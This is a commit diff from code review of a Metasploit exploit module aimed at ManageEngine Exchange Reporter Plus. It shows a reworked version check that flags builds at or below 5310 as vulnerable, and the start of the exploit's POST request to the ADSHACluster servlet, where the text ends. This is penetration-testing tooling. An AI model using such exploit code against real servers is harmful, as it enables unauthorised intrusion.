Code review changes

Use target_uri, pass the URL path segments separately to normalize_uri, replace print with vprint, return CheckCode::Appears
GSoC/Meterpreter_Web_Console
Kacper Szurek 2018-07-12 14:27:28 +02:00
parent 2196640de4
commit 486225c2a8
No known key found for this signature in database
GPG Key ID: B2948EE8A0E07D2A
1 changed files with 27 additions and 25 deletions


@ -46,39 +46,41 @@ class MetasploitModule < Msf::Exploit::Remote
def check def check
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/GetProductVersion') 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
}) })
if res && res.code == 200 unless res
begin vprint_error 'Connection failed'
json = res.get_json_document return CheckCode::Safe
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
return Exploit::CheckCode::Unknown
end
if json.empty? || !json['BUILD_NUMBER']
print_error("Wrong server response")
return Exploit::CheckCode::Unknown
end
print_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
else
Exploit::CheckCode::Unknown
end end
unless res.code == 200
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
begin
json = res.get_json_document
raise if json.empty? || !json['BUILD_NUMBER']
rescue
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
vprint_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
return CheckCode::Appears
end
CheckCode::Safe
end end
def exploit def exploit
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/ADSHACluster'), 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
'vars_post' => { 'vars_post' => {
'MTCALL' => "nativeClient", 'MTCALL' => "nativeClient",
'BCP_RLL' => "0102", 'BCP_RLL' => "0102",